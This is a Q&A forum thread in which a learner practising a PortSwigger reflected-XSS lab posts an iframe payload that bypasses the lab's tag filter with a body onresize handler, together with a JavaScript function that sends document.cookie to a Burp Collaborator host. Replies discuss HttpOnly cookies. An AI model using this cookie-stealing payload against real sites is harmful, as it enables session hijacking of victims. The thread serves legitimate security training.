0

I am busy with the portswigger lab studies, doing "Reflected XSS into HTML context with most tags and attributes blocked".

I successfully fire the print() on myself and the simulated victim, but for extra practice in preparing for the burp suite exam, I am trying to extend my exploit server body code content to steal the victim cookie in burp collaborator out of band. The simulated victim click on any link send.

I get hit with the below exploit server body code, but no document.cookie value in my OOB listening server. Is it possible or is it that the victim cookie has the httponly set?

function StealCookies() {
  document.write('<img src="http://BurpCol.oastify.com?cookieStealer="+document.cookie>');
}

<iframe src="https://burp-lab-id.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=StealCookies()%3E" onload=this.style.width='1000px'>

my javascript code skills are very basic, I will appreciate any feedback to make successful cookie stealer exploit, as the labs just do alert() or print().

Link 2 lab: https://portswigger.net/web-security/cross-site-scripting/contexts/lab-html-context-with-most-tags-and-attributes-blocked

Thanks J

schroeder
  • 123,438
  • 55
  • 284
  • 319
Juan
  • 1

1 Answers1

-1

You can check httponly or cookie secure. Check Header Response to ensure.

Jhon Laurence
  • 11
  • 4
  • I have to assume the cookie value is set "httponly" and this is why i cannot steal it, but the lab was not made for what i want to test. – Juan Jun 18 '22 at 18:56
  • Just a question, what is the purpose of the laboratory? The Httponly or Secure header always guarantees the protection of the cookie, making it impossible to steal a victim's session. – Jhon Laurence Jun 18 '22 at 21:44
  • To solve this portswigger lab with Burp Suite proxy tool, perform a cross-site scripting attack that bypasses the WAF and calls the print() function, after Delivering the exploit to simulated victim that clicks on the link to trigger payload. – Juan Jun 19 '22 at 18:10